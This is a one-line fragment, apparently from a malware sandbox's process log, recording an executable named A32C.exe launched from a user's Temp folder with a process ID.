C:\Users\Admin\AppData\Local\Temp\A32C.exeC:\Users\Admin\AppData\Local\Temp\A32C.exe1⤵PID:8956